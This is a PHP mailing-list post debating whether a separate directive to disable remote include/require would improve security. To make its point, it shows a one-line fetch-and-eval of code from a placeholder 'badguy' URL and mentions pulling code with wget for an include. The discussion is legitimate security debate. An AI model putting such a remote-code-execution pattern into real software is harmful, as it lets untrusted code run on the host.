Kelvin Jones wrote: > I would like to see a new directive to go alongside "allow_url_fopen" to > allow people to turn on or off the ability to include/require a remote > file. > > The ability to include and execute a file as php from a remote host > leaves many applications open to cross-site-scripting attacks. > This would be easily avoidable if we had a directive > (allow_url_include?) that by default removed this capability. Seems kinda pointless to me... If a Progammer is dumb enough to include/require untrusted source code, they can just as easily do: eval(implode('', file('http://example.com/badguy.php'))); after you've turned "OFF" allow_url_include but left allow_url_fopen "ON" If an attacker is managing to alter your PHP source to pull in his remote PHP, then the remote PHP feature isn't really all that crucial -- It's more convenient for them to suck it in from their remote server, perhaps, or maybe they are worming through a database field that is too short to hold all their source, so they shove in an "include" -- Still, *any* PHP code they can execute will eventually give them control anyway. If an attacker gains access to remote "trusted" source and replaces it, then your decision to trust that source was faulty -- Which is neither helped nor hindered by the remote include function, really. If you needed that source, you can find a way to get it and have PHP evaluate it, unless you disable all remote file access completely... Even then, a cron job to snag it with wget, and an include, and you're back at Square One. I guess I'm saying that only education and diligence by programmers is going to avoid this attack. Turning off only the remote include, but not remote fopen, won't stop anybody with half a clue for more than 30 seconds. This is just my take on it, and there could easily be subtle issues or known exploits you are trying to squash of which I know nothing. -- Like Music? http://l-i-e.com/artists.htm -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php